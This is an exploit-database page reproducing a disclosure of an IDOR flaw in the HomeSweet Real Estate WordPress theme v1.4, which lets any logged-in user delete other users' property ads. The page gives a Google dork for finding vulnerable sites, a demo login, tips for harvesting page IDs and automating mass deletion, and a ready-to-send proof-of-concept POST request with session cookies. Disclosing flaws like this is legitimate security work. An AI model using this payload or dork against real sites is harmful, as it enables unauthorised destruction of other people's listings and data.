Advertisement






HomeSweet - Real Estate WordPress Theme v1.4 - IDOR leading to arbitrary deletion of ads

CVE Category Price Severity
CVE-2021-39823 CWE-639 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2020-07-13
CPE
cpe:cpe:/a:wordpress:homesweet_real_estate_wordpress_theme:1.4
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070065

Below is a copy:

HomeSweet - Real Estate WordPress Theme v1.4 - IDOR leading to arbitrary deletion of ads
[+] Exploit Title: HomeSweet - Real Estate WordPress Theme v1.4 - IDOR leading to arbitrary deletion of ads
[+] Google Dork: inurl:/wp-content/themes/homesweet/
[+] Date: 2020-06-17
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: ApusTheme [ https://themeforest.net/user/apustheme ]
[+] Software Version: 1.4
[+] Software Link: https://themeforest.net/item/homesweet-real-estate-wordpress-theme/20560953
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-639



### [ Info: ]

[i] IDOR leading to arbitrary deletion of ads vulnerability was discovered in the HomeSweet Real Estate theme through 1.4 for WordPress.

[i] Basic user account: vladvector / vector (login / password)

[i] You need to know the unique ID of the page you want to delete, unless you are going to automate the process and delete everything at all. To find out the unique ID of any page, you should check the <body> tag -> class postid-XXXX, where XXXX == unique page ID.



### [ PoC: ]

[!] POST /homesweet/my-properties/ HTTP/1.1
Host: demoapus.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: https://demoapus.com
Referer: https://demoapus.com/homesweet/remove-property/?id=2769
Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4a2f61dbe4052069fd7f20535e969bfa=vladvector%7C1592611943%7ChQcnlgehpsVMZNAWEc3mV7cpWnbxanBcHN9EpQQ7OLj%7C15f5fb0a9060ba32a5ac300e3d7bf2cbd00e4a039972fe87693eec0abef6ba16; __cfduid=d07a8a08f37a610559150403054bdcae31592415303; redux_blast=1592425112; PHPSESSID=9cbohsp0eo720ke2nuebbvau36; apus_preset=1547539960; hidde_popup_newsletter=1; homesweet_recently_viewed=3724%7C3725%7C3076%7C2089

property_id=2769&remove_property_form=



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.